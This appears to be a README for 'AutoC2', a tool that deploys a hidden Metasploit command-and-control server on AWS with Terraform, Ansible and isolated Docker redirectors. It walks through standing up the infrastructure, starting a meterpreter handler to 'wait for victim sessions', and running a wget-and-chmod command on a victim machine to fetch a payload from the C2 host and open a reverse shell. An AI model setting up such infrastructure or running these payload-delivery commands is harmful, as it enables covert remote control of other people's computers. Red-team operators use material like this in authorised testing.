A quick isolated C2 Deployer.
AutoC2 makes use of terraform + ansible to deploy and hide a command and control server with isolated docker network within less than 5 mins in a single click!
Brief outline of what the tool does :
deploys an ec2 micro instance on desired region given by user.
setup the C2 server which is not exposed to the internet with the help of isolated docker network which consists of multiple socat redirectors and a metasploit container instance.
uses meterpreter_reverse_http as payload and similar payloads such as meterpreter_reverse_https and meterpreter_reverse_tcp works as well. (requires modification to docker_delivery.rc file)
This automated script is built over technique demonstrated by the author of following blog. All credits for technique/ detailed explanation of how this is built can be found here:
terraform must be installed
ansible(python 3)must be installed.
pip3 install ansible
your IAM account credentials (Aws access key and secret key) with admin privileges.
AWS Region to be deployed and image(tested on ubuntu and works on debain) AMI code.
set environment variable to ignore ssh key trust warnings
Only files we touch for changing configuration is vars.tf and terraform.tfvars.
first generate SSH keys for setting up public key authentication on any launched instances.
ssh-keygen -f keyy
chmod 600 keyy
inside vars.tf , update the path to keys in PRIVATE_KEY , PUBLIC_KEY and other values such as region_aws and AMI value (can be found at cloud-images.ubuntu.com).
inside terraform.tfvars , update IAM user access key and secret key.
run the following command inside this repo project root to initiatize resources.
terraform init
- Now run the following command to bring up the c2 server . this inturn calls up the ansible playbook to set up the software provisioning and isolated docker network.
terraform apply
- That's it! Infra is set up. Now ssh to the C2 instance using same priv key which was generated before and execute docker_delivery.rc metasploit script to start listening for connections.
SSH -i kkey ubuntu@c2-ip
- Verify containers are running.
sudo docker container ls
- Execute metasploit auto handler script inside msf container. and wait for victim sessions.
sudo docker container exec -it msf /bin/bash
./msfconsole -r docker_delivery.rc
By default it generates payload for linux x64 systems.can be modified for different target by modifying docker_delivery.rc file
By default docker_delivery.rc uses certificate picked up automatically by metasploit.
On a victim box, execute the following to get reverse meterpreter shell on attacker msf container.
wget --no-check-certificate https://c2IP/delivery
chmod +x delivery
- Finally to destroy the infrastructure completely(use this with caution!) use the following command :
terraform destroy